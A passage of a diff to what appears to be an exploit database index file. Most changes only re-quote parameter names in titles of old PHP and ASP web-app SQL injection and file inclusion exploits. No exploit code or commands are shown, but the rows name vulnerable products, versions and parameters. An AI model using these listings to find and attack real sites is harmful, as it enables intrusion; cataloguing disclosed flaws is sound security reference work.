Inclusion",2006-12-16,ajann,php,webapps,0 2943,platforms/php/webapps/2943.txt,"Azucar CMS 1.3 - 'admin/index_sitios.php' File Inclusion",2006-12-18,nuffsaid,php,webapps,0 2944,platforms/php/webapps/2944.txt,"VerliAdmin 0.3 - 'index.php' Remote File Inclusion",2006-12-18,Kacper,php,webapps,0 -2945,platforms/php/webapps/2945.txt,"Uploader & Downloader 3.0 - (id_user) SQL Injection",2006-12-18,"the master",php,webapps,0 +2945,platforms/php/webapps/2945.txt,"Uploader & Downloader 3.0 - 'id_user' SQL Injection",2006-12-18,"the master",php,webapps,0 2948,platforms/php/webapps/2948.txt,"RateMe 1.3.2 - 'main.inc.php' Remote File Inclusion",2006-12-18,"Al7ejaz Hacker",php,webapps,0 2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Injection",2006-12-19,rgod,php,webapps,0 2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b - 'buycd.php' Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0 @@ -17790,7 +17794,7 @@ id,file,description,date,author,platform,type,port 3011,platforms/php/webapps/3011.pl,"Fishyshoop 0.930b - Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0 3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 - 'ataturk.php' Remote File Inclusion",2006-12-25,ShaFuck31,php,webapps,0 3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Arbitrary File Upload / Code Execution",2006-12-25,CorryL,php,webapps,0 -3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 - (main) SQL Injection",2006-12-26,ajann,asp,webapps,0 +3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 - 'main' SQL Injection",2006-12-26,ajann,asp,webapps,0 3016,platforms/php/webapps/3016.php,"Cahier de texte 2.2 - Bypass General Access Protection Exploit",2006-12-26,DarkFig,php,webapps,0 3017,platforms/php/webapps/3017.php,"PHP-Update 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,php,webapps,0 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b - Remote File Inclusion",2006-12-26,bd0rk,php,webapps,0 @@ -17881,14 +17885,14 @@ id,file,description,date,author,platform,type,port 3171,platforms/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - 'index.php gen' Remote File Inclusion",2007-01-21,DeltahackingTEAM,php,webapps,0 3172,platforms/php/webapps/3172.php,"webSPELL 4.01.02 - 'gallery.php' Blind SQL Injection",2007-01-21,r00t,php,webapps,0 3174,platforms/php/webapps/3174.txt,"Upload Service 1.0 - 'top.php maindir' Remote File Inclusion",2007-01-21,y3dips,php,webapps,0 -3175,platforms/php/webapps/3175.pl,"VisoHotlink 1.01 - functions.visohotlink.php Remote File Inclusion",2007-01-22,bd0rk,php,webapps,0 +3175,platforms/php/webapps/3175.pl,"VisoHotlink 1.01 - 'functions.visohotlink.php' Remote File Inclusion",2007-01-22,bd0rk,php,webapps,0 3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 - 'poll_frame.php poll_id' Remote Code Execution",2007-01-23,r0ut3r,php,webapps,0 3183,platforms/php/webapps/3183.txt,"BBClone 0.31 - 'selectlang.php' Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 3184,platforms/php/webapps/3184.txt,"phpXD 0.3 - (path) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 - 'config.php sql_language' Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 3186,platforms/asp/webapps/3186.txt,"ASP EDGE 1.2b - 'user.asp' SQL Injection",2007-01-24,ajann,asp,webapps,0 3187,platforms/asp/webapps/3187.txt,"ASP NEWS 3.0 - 'news_detail.asp' SQL Injection",2007-01-24,ajann,asp,webapps,0 -3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 - (MODULES_DIR) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 +3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 - 'MODULES_DIR' Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 3192,platforms/php/webapps/3192.pl,"Xero Portal - 'phpbb_root_path' Remote File Inclusion",2007-01-24,"Mehmet Ince",php,webapps,0 3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - SQL Injection",2007-01-25,ajann,asp,webapps,0 3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 - 'print.asp' SQL Injection",2007-01-25,ajann,asp,webapps,0 @@ -17982,7 +17986,7 @@ id,file,description,date,author,platform,type,port 3324,platforms/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 - (ht_pfad) Remote File Inclusion",2007-02-16,kezzap66345,php,webapps,0 3325,platforms/php/webapps/3325.pl,"webSPELL 4.01.02 - (showonly) Blind SQL Injection",2007-02-16,DNX,php,webapps,0 3326,platforms/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - 'root' Local File Inclusion",2007-02-16,Snip0r,php,webapps,0 -3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - (album) SQL Injection",2007-02-17,Bl0od3r,php,webapps,0 +3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - 'album' SQL Injection",2007-02-17,Bl0od3r,php,webapps,0 3328,platforms/php/webapps/3328.htm,"S-Gastebuch 1.5.3 - (gb_pfad) Remote File Inclusion",2007-02-18,ajann,php,webapps,0 3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 - 'archives.php' Remote File Disclosure",2007-02-18,r0ut3r,php,webapps,0 3334,platforms/php/webapps/3334.asp,"PHP-Nuke Module Emporium 2.3.0 - SQL Injection",2007-02-19,ajann,php,webapps,0 @@ -17994,7 +17998,7 @@ id,file,description,date,author,platform,type,port 3345,platforms/php/webapps/3345.pl,"PHP-Nuke 8.0 Final - (INSERT) SQL Injection",2007-02-20,krasza,php,webapps,0 3346,platforms/php/webapps/3346.pl,"PHP-Nuke 8.0 Final - (HTTP Referers) SQL Injection",2007-02-20,krasza,php,webapps,0 3348,platforms/php/webapps/3348.txt,"SendStudio 2004.14 - (ROOTDIR) Remote File Inclusion",2007-02-20,K-159,php,webapps,0 -3351,platforms/php/webapps/3351.pl,"webSPELL 4.01.02 - (topic) SQL Injection",2007-02-21,DNX,php,webapps,0 +3351,platforms/php/webapps/3351.pl,"webSPELL 4.01.02 - 'topic' SQL Injection",2007-02-21,DNX,php,webapps,0 3352,platforms/php/webapps/3352.php,"Connectix Boards 0.7 - 'p_skin' Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0 3353,platforms/php/webapps/3353.txt,"DBImageGallery 1.2.2 - (donsimg_base_path) Remote File Inclusion",2007-02-21,Denven,php,webapps,0 3354,platforms/php/webapps/3354.txt,"DBGuestbook 1.1 - (dbs_base_path) Remote File Inclusion",2007-02-21,Denven,php,webapps,0 @@ -18018,7 +18022,7 @@ id,file,description,date,author,platform,type,port 39567,platforms/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",php,webapps,80 3398,platforms/php/webapps/3398.txt,"Mani Stats Reader 1.2 - (ipath) Remote File Inclusion",2007-03-02,mozi,php,webapps,0 3400,platforms/php/webapps/3400.pl,"webSPELL 4.01.02 - Multiple SQL Injections",2007-03-02,DNX,php,webapps,0 -3402,platforms/php/webapps/3402.php,"webSPELL 4.01.02 - Remote PHP Code Execution",2007-03-03,DarkFig,php,webapps,0 +3402,platforms/php/webapps/3402.php,"webSPELL 4.01.02 - PHP Remote Code Execution",2007-03-03,DarkFig,php,webapps,0 3403,platforms/php/webapps/3403.php,"Rigter Portal System (RPS) 6.2 - Blind SQL Injection",2007-03-04,s0cratex,php,webapps,0 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - 'eintrag.php sqllog' Remote File Inclusion",2007-03-04,bd0rk,php,webapps,0 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - 'subcat.php' SQL Injection",2007-03-04,ajann,php,webapps,0 @@ -18082,7 +18086,7 @@ id,file,description,date,author,platform,type,port 3509,platforms/php/webapps/3509.pl,"ScriptMagix Jokes 2.0 - 'index.php catid' SQL Injection",2007-03-18,ajann,php,webapps,0 3510,platforms/php/webapps/3510.pl,"ScriptMagix Recipes 2.0 - 'index.php catid' SQL Injection",2007-03-18,ajann,php,webapps,0 3511,platforms/php/webapps/3511.pl,"ScriptMagix Photo Rating 2.0 - SQL Injection",2007-03-18,ajann,php,webapps,0 -3512,platforms/php/webapps/3512.txt,"PHP-Nuke - iFrame (iframe.php) Remote File Inclusion",2007-03-18,"Cold Zero",php,webapps,0 +3512,platforms/php/webapps/3512.txt,"PHP-Nuke - 'iframe.php' Remote File Inclusion",2007-03-18,"Cold Zero",php,webapps,0 3513,platforms/php/webapps/3513.php,"Katalog Plyt Audio (pl) 1.0 - SQL Injection",2007-03-18,Kacper,php,webapps,0 3515,platforms/php/webapps/3515.pl,"ScriptMagix Lyrics 2.0 - 'index.php recid' SQL Injection",2007-03-19,ajann,php,webapps,0 3516,platforms/php/webapps/3516.php,"MetaForum 0.513 Beta - Arbitrary File Upload",2007-03-19,Gu1ll4um3r0m41n,php,webapps,0 @@ -18154,7 +18158,7 @@ id,file,description,date,author,platform,type,port 3625,platforms/php/webapps/3625.pl,"XOOPS Module Tiny Event 1.01 - 'id' SQL Injection",2007-04-01,ajann,php,webapps,0 3626,platforms/php/webapps/3626.pl,"XOOPS Module Kshop 1.17 - 'id' SQL Injection",2007-04-01,ajann,php,webapps,0 3628,platforms/php/webapps/3628.txt,"CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion",2007-04-01,GoLd_M,php,webapps,0 -3629,platforms/php/webapps/3629.pl,"XOOPS Module Camportail 1.1 - (camid) SQL Injection",2007-04-01,ajann,php,webapps,0 +3629,platforms/php/webapps/3629.pl,"XOOPS Module Camportail 1.1 - 'camid' SQL Injection",2007-04-01,ajann,php,webapps,0 3630,platforms/php/webapps/3630.htm,"XOOPS Module debaser 0.92 - 'genre.php' Blind SQL Injection",2007-04-01,ajann,php,webapps,0 3631,platforms/php/webapps/3631.txt,"FlexPHPNews 0.0.5 - 'newsid' Parameter SQL Injection",2007-04-01,Dj7xpl,php,webapps,0 3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P 2.0 - 'cid' SQL Injection",2007-04-01,ajann,php,webapps,0 @@ -18174,7 +18178,7 @@ id,file,description,date,author,platform,type,port 3659,platforms/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusion",2007-04-04,kezzap66345,php,webapps,0 3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - (script_path) Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0 3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection",2007-04-04,ajann,php,webapps,0 -3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 - mutant_functions.php Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0 +3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 - 'mutant_functions.php' Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0 3666,platforms/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - 'visit.php' SQL Injection",2007-04-04,ajann,php,webapps,0 3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - 'site_path' Parameter Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 @@ -18324,7 +18328,7 @@ id,file,description,date,author,platform,type,port 3885,platforms/php/webapps/3885.txt,"telltarget 1.3.3 - (tt_docroot) Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 3886,platforms/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - 'print.php news_id' SQL Injection",2007-05-09,Silentz,php,webapps,0 3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - 'search.php search' SQL Injection",2007-05-09,Silentz,php,webapps,0 -3894,platforms/php/webapps/3894.txt,"Original 0.11 - config.inc.php x[1] Remote File Inclusion",2007-05-10,GoLd_M,php,webapps,0 +3894,platforms/php/webapps/3894.txt,"Original 0.11 - 'config.inc.php' 'x[1]' Remote File Inclusion",2007-05-10,GoLd_M,php,webapps,0 3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - SQL Injection",2007-05-10,warlord,php,webapps,0 3896,platforms/php/webapps/3896.pl,"TaskDriver 1.2 - Login Bypass / SQL Injection",2007-05-10,Silentz,php,webapps,0 3900,platforms/php/webapps/3900.php,"Snaps! Gallery 1.4.4 - Remote User Pass Change Exploit",2007-05-11,Dj7xpl,php,webapps,0 @@ -18348,13 +18352,13 @@ id,file,description,date,author,platform,type,port 3931,platforms/php/webapps/3931.htm,"XOOPS Module resmanager 1.21 - Blind SQL Injection",2007-05-15,ajann,php,webapps,0 3932,platforms/php/webapps/3932.pl,"XOOPS Module Glossarie 1.7 - 'sid' SQL Injection",2007-05-15,ajann,php,webapps,0 3933,platforms/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 - 'index.php' SQL Injection",2007-05-15,ajann,php,webapps,0 -3935,platforms/php/webapps/3935.txt,"Glossword 1.8.1 - custom_vars.php Remote File Inclusion",2007-05-16,BeyazKurt,php,webapps,0 +3935,platforms/php/webapps/3935.txt,"Glossword 1.8.1 - 'custom_vars.php' Remote File Inclusion",2007-05-16,BeyazKurt,php,webapps,0 3936,platforms/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - 'tr' Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps,0 3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion",2007-05-16,kezzap66345,php,webapps,0 3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - 'newnr' Parameter SQL Injection",2007-05-16,Silentz,php,webapps,0 3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - 'question.php questionref' SQL Injection",2007-05-16,Silentz,php,webapps,0 3944,platforms/php/webapps/3944.txt,"Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0 -3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - ImageImageMagick.php Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0 +3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - 'ImageImageMagick.php' Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0 3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion",2007-05-17,"Alkomandoz Hacker",php,webapps,0 3948,platforms/php/webapps/3948.txt,"Libstats 1.0.3 - 'template_csv.php' Remote File Inclusion",2007-05-18,"Mehmet Ince",php,webapps,0 3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - 'index.php lang' Local File Inclusion",2007-05-18,MurderSkillz,php,webapps,0 @@ -18391,7 +18395,7 @@ id,file,description,date,author,platform,type,port 4004,platforms/php/webapps/4004.php,"Inout Search Engine - Remote Code Execution",2007-05-29,BlackHawk,php,webapps,0 4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 - 'live_status.lib.php' Remote File Inclusion",2007-05-29,"ThE TiGeR",php,webapps,0 4006,platforms/php/webapps/4006.php,"Pheap 2.0 - Authentication Bypass / Remote Code Execution",2007-05-29,Silentz,php,webapps,0 -4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 - (tr) SQL Injection",2007-05-30,BAHADIR,asp,webapps,0 +4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 - 'tr' SQL Injection",2007-05-30,BAHADIR,asp,webapps,0 4019,platforms/php/webapps/4019.php,"Particle Gallery 1.0.1 - SQL Injection",2007-06-01,Silentz,php,webapps,0 4020,platforms/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0 4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion",2007-06-01,GoLd_M,php,webapps,0 @@ -18559,7 +18563,7 @@ id,file,description,date,author,platform,type,port 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - 'activateuser.php' Local File Inclusion",2007-08-26,bd0rk,php,webapps,0 4320,platforms/php/webapps/4320.txt,"SomeryC 0.2.4 - 'include.php skindir' Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0 4326,platforms/php/webapps/4326.txt,"Arcadem 2.01 - SQL Injection / Remote File Inclusion",2007-08-27,SmOk3,php,webapps,0 -4327,platforms/php/webapps/4327.txt,"WBB2-Addon: Acrotxt 1.0 - (show) SQL Injection",2007-08-27,D4m14n,php,webapps,0 +4327,platforms/php/webapps/4327.txt,"WBB2-Addon: Acrotxt 1.0 - 'show' SQL Injection",2007-08-27,D4m14n,php,webapps,0 4329,platforms/php/webapps/4329.txt,"Micro CMS 3.5 - 'revert-content.php' SQL Injection",2007-08-28,"not sec group",php,webapps,0 4330,platforms/php/webapps/4330.txt,"ACG News 1.0 - 'aid'/'catid' SQL Injection",2007-08-28,SmOk3,php,webapps,0 4331,platforms/php/webapps/4331.pl,"DL PayCart 1.01 - 'viewitem.php ItemID' Blind SQL Injection",2007-08-28,irvian,php,webapps,0 @@ -18578,7 +18582,7 @@ id,file,description,date,author,platform,type,port 4352,platforms/php/webapps/4352.txt,"Weblogicnet - (files_dir) Multiple Remote File Inclusion",2007-09-02,bius,php,webapps,0 4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - 'error_view.php ID' SQL Injection",2007-09-02,k1tk4t,php,webapps,0 4356,platforms/php/webapps/4356.txt,"eNetman 20050830 - 'index.php' Remote File Inclusion",2007-09-03,JaheeM,php,webapps,0 -4358,platforms/php/webapps/4358.txt,"STPHPLibrary - (STPHPLIB_DIR) Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0 +4358,platforms/php/webapps/4358.txt,"STPHPLibrary - 'STPHPLIB_DIR' Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0 4363,platforms/php/webapps/4363.txt,"PHPOF 20040226 - 'DB_adodb.class.php' Remote File Inclusion",2007-09-04,"ThE TiGeR",php,webapps,0 4365,platforms/php/webapps/4365.txt,"AnyInventory 2.0 - 'Environment.php' Remote File Inclusion",2007-09-05,"ThE TiGeR",php,webapps,0 4368,platforms/php/webapps/4368.txt,"PHPMytourney - 'menu.php' Remote File Inclusion",2007-09-06,S.W.A.T.,php,webapps,0 @@ -18604,7 +18608,7 @@ id,file,description,date,author,platform,type,port 4401,platforms/php/webapps/4401.txt,"Joomla! Component Joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0 4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - 'skill_delete' Parameter SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0 4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - 'settings.inc.php approot' Remote File Inclusion",2007-09-14,"arfis project",php,webapps,0 -4406,platforms/php/webapps/4406.txt,"phpFFL 1.24 - PHPFFL_FILE_ROOT Remote File Inclusion",2007-09-14,Dj7xpl,php,webapps,0 +4406,platforms/php/webapps/4406.txt,"phpFFL 1.24 - 'PHPFFL_FILE_ROOT' Remote File Inclusion",2007-09-14,Dj7xpl,php,webapps,0 4407,platforms/php/webapps/4407.java,"PHP Webquest 2.5 - (id_actividad) SQL Injection",2007-09-14,D4real_TeaM,php,webapps,0 4408,platforms/php/webapps/4408.pl,"JBlog 1.0 - 'index.php id' SQL Injection",2007-09-14,s4mi,php,webapps,0 4410,platforms/php/webapps/4410.php,"Gelato - 'index.php post' SQL Injection",2007-09-14,s0cratex,php,webapps,0 @@ -18651,7 +18655,7 @@ id,file,description,date,author,platform,type,port 4467,platforms/php/webapps/4467.pl,"MD-Pro 1.0.76 - SQL Injection",2007-09-29,undefined1_,php,webapps,0 4469,platforms/php/webapps/4469.txt,"Mambo Component Mambads 1.5 - SQL Injection",2007-09-29,Sniper456,php,webapps,0 4470,platforms/php/webapps/4470.txt,"mxBB Module mx_glance 2.3.3 - Remote File Inclusion",2007-09-29,bd0rk,php,webapps,0 -4471,platforms/php/webapps/4471.txt,"phpBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion",2007-09-30,"Mehmet Ince",php,webapps,0 +4471,platforms/php/webapps/4471.txt,"phpBB Mod OpenID 0.2.0 - 'BBStore.php' Remote File Inclusion",2007-09-30,"Mehmet Ince",php,webapps,0 4472,platforms/php/webapps/4472.txt,"actSite 1.56 - 'news.php' Local File Inclusion",2007-10-01,DNX,php,webapps,0 4473,platforms/php/webapps/4473.txt,"actSite 1.991 Beta - 'base.php' Remote File Inclusion",2007-10-01,DNX,php,webapps,0 4475,platforms/php/webapps/4475.php,"PHP-Fusion module Expanded Calendar 2.x - SQL Injection",2007-10-01,Matrix86,php,webapps,0 @@ -18676,7 +18680,7 @@ id,file,description,date,author,platform,type,port 4500,platforms/php/webapps/4500.txt,"TorrentTrader Classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0 4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 - galerie.php SQL Injection",2007-10-08,"[PHCN] Mahjong",php,webapps,0 4502,platforms/php/webapps/4502.txt,"xKiosk 3.0.1i - 'xkurl.php PEARPATH' Remote File Inclusion",2007-10-08,"BorN To K!LL",php,webapps,0 -4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 - common.php Remote File Inclusion",2007-10-08,S.W.A.T.,php,webapps,0 +4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 - 'common.php' Remote File Inclusion",2007-10-08,S.W.A.T.,php,webapps,0 4504,platforms/php/webapps/4504.txt,"Softbiz Jobs & Recruitment - SQL Injection",2007-10-08,"Khashayar Fereidani",php,webapps,0 4505,platforms/php/webapps/4505.php,"LightBlog 8.4.1.1 - Remote Code Execution",2007-10-09,BlackHawk,php,webapps,0 4507,platforms/php/webapps/4507.txt,"Joomla! Component mp3 allopass 1.0 - Remote File Inclusion",2007-10-10,NoGe,php,webapps,0 @@ -18687,7 +18691,7 @@ id,file,description,date,author,platform,type,port 4512,platforms/php/webapps/4512.txt,"nuseo PHP enterprise 1.6 - Remote File Inclusion",2007-10-10,BiNgZa,php,webapps,0 4513,platforms/php/webapps/4513.php,"PHP-Stats 0.1.9.2 - Multiple Vulnerabilities",2007-10-10,EgiX,php,webapps,0 4518,platforms/php/webapps/4518.txt,"WebDesktop 0.1 - Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0 -4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - client.php Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0 +4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - 'client.php' Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0 4520,platforms/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion",2007-10-11,0in,php,webapps,0 4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0 4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Module Newsletter - SQL Injection",2007-10-11,s4mi,php,webapps,0 @@ -18708,8 +18712,8 @@ id,file,description,date,author,platform,type,port 4549,platforms/php/webapps/4549.txt,"PHP Project Management 0.8.10 - Multiple Local/Remote File Inclusions",2007-10-21,GoLd_M,php,webapps,0 4550,platforms/php/webapps/4550.pl,"BBPortalS 2.0 - Blind SQL Injection",2007-10-21,Max007,php,webapps,0 4551,platforms/php/webapps/4551.txt,"PeopleAggregator 1.2pre6-release-53 - Multiple Remote File Inclusion",2007-10-21,GoLd_M,php,webapps,0 -4554,platforms/php/webapps/4554.txt,"Socketmail 2.2.8 - fnc-readmail3.php Remote File Inclusion",2007-10-22,BiNgZa,php,webapps,0 -4555,platforms/php/webapps/4555.txt,"TOWeLS 0.1 - scripture.php Remote File Inclusion",2007-10-22,GoLd_M,php,webapps,0 +4554,platforms/php/webapps/4554.txt,"Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion",2007-10-22,BiNgZa,php,webapps,0 +4555,platforms/php/webapps/4555.txt,"TOWeLS 0.1 - 'scripture.php' Remote File Inclusion",2007-10-22,GoLd_M,php,webapps,0 4557,platforms/php/webapps/4557.txt,"Simple PHP Blog (sPHPblog) 0.5.1 - Multiple Vulnerabilities",2007-10-22,DarkFig,php,webapps,0 4558,platforms/php/webapps/4558.txt,"InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion",2007-10-22,"BorN To K!LL",php,webapps,0 4561,platforms/php/webapps/4561.txt,"Flatnuke 3 - Remote Command Execution / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 @@ -18722,7 +18726,7 @@ id,file,description,date,author,platform,type,port 4577,platforms/php/webapps/4577.txt,"CaupoShop Pro 2.x - 'action' Remote File Inclusion",2007-10-28,mozi,php,webapps,0 4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - 'emc.asp' SQL Injection",2007-10-28,hak3r-b0y,asp,webapps,0 4580,platforms/php/webapps/4580.txt,"FireConfig 0.5 - 'dl.php' Remote File Disclosure",2007-10-28,GoLd_M,php,webapps,0 -4581,platforms/php/webapps/4581.txt,"Sige 0.1 - sige_init.php Remote File Inclusion",2007-10-28,GoLd_M,php,webapps,0 +4581,platforms/php/webapps/4581.txt,"Sige 0.1 - 'sige_init.php' Remote File Inclusion",2007-10-28,GoLd_M,php,webapps,0 4582,platforms/php/webapps/4582.txt,"teatro 1.6 - (basePath) Remote File Inclusion",2007-10-28,"Alkomandoz Hacker",php,webapps,0 4585,platforms/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 - Remote File Inclusion",2007-10-29,r00t@zapak.com,php,webapps,0 4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Arbitrary File Upload",2007-10-29,r00t@zapak.com,php,webapps,0 @@ -18733,7 +18737,7 @@ id,file,description,date,author,platform,type,port 4592,platforms/php/webapps/4592.txt,"ISPworker 1.21 - download.php Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 4593,platforms/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,php,webapps,0 4595,platforms/php/webapps/4595.txt,"Synergiser 1.2 RC1 - Local File Inclusion / Full Path Disclosure",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 -4596,platforms/php/webapps/4596.txt,"Scribe 0.2 - Remote PHP Code Execution",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 +4596,platforms/php/webapps/4596.txt,"Scribe 0.2 - PHP Remote Code Execution",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 4597,platforms/php/webapps/4597.txt,"DM Guestbook 0.4.1 - Multiple Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - 'index.php module' Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 4602,platforms/php/webapps/4602.txt,"GuppY 4.6.3 - 'includes.inc selskin' Remote File Inclusion",2007-11-03,irk4z,php,webapps,0 @@ -18750,7 +18754,7 @@ id,file,description,date,author,platform,type,port 4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script 1 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 4619,platforms/php/webapps/4619.txt,"Softbiz Banner Exchange Network Script 1.0 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 4620,platforms/php/webapps/4620.txt,"Softbiz Link Directory Script - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 -4621,platforms/php/webapps/4621.txt,"patBBcode 1.0 - bbcodeSource.php Remote File Inclusion",2007-11-12,p4sswd,php,webapps,0 +4621,platforms/php/webapps/4621.txt,"patBBcode 1.0 - 'bbcodeSource.php' Remote File Inclusion",2007-11-12,p4sswd,php,webapps,0 4622,platforms/php/webapps/4622.txt,"Myspace Clone Script - SQL Injection",2007-11-13,t0pP8uZz,php,webapps,0 4623,platforms/php/webapps/4623.txt,"Toko Instan 7.6 - Multiple SQL Injections",2007-11-14,k1tk4t,php,webapps,0 4626,platforms/php/webapps/4626.txt,"Joomla! Component Carousel Flash Image Gallery - Remote File Inclusion",2007-11-16,Crackers_Child,php,webapps,0 @@ -18786,7 +18790,7 @@ id,file,description,date,author,platform,type,port 4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion",2007-11-25,ShAy6oOoN,php,webapps,0 4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - SQL Injection",2007-11-25,"Khashayar Fereidani",php,webapps,0 4661,platforms/php/webapps/4661.py,"DeluxeBB 1.09 - Remote Admin Email Change",2007-11-26,nexen,php,webapps,0 -4662,platforms/php/webapps/4662.txt,"Tilde CMS 4.x - (aarstal) SQL Injection",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 +4662,platforms/php/webapps/4662.txt,"Tilde CMS 4.x - 'aarstal' SQL Injection",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 4665,platforms/php/webapps/4665.txt,"Eurologon CMS - Multiple SQL Injections",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4666,platforms/php/webapps/4666.txt,"Eurologon CMS - files.php 